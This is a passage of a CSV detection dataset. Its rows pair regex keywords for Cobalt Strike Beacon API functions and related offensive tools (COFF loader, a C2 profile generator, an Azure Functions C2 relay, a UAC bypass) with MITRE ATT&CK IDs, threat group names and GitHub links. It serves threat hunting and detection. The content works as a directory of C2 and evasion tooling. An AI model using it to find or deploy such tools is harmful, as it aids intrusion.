T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35647" "*Beacon_Com_Struct*",".{0,1000}Beacon_Com_Struct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 
- T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35648" "*beacon_command_describe*",".{0,1000}beacon_command_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 
- T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35649" "*beacon_command_detail(""remotepipelist""*",".{0,1000}beacon_command_detail\(\""remotepipelist\"".{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","35650" "*beacon_command_detail*",".{0,1000}beacon_command_detail.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35651" "*beacon_command_register*",".{0,1000}beacon_command_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35652" "*beacon_commands*",".{0,1000}beacon_commands.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - 
Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35653" "*beacon_compatibility.c*",".{0,1000}beacon_compatibility\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 
Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","35654" "*beacon_compatibility.h*",".{0,1000}beacon_compatibility\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","35655" "*beacon_elevator_describe*",".{0,1000}beacon_elevator_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35656" 
"*beacon_elevator_register*",".{0,1000}beacon_elevator_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35657" "*beacon_elevators*",".{0,1000}beacon_elevators.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35658" "*beacon_elevators*",".{0,1000}beacon_elevators.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35659" "*beacon_endpoint*c2Get*",".{0,1000}beacon_endpoint.{0,1000}c2Get.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","35660" "*beacon_endpoint*c2Post*",".{0,1000}beacon_endpoint.{0,1000}c2Post.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","35661" 
"*beacon_execute_job*",".{0,1000}beacon_execute_job.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35662" "*beacon_exploit_describe*",".{0,1000}beacon_exploit_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35663" "*beacon_exploit_register*",".{0,1000}beacon_exploit_register.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 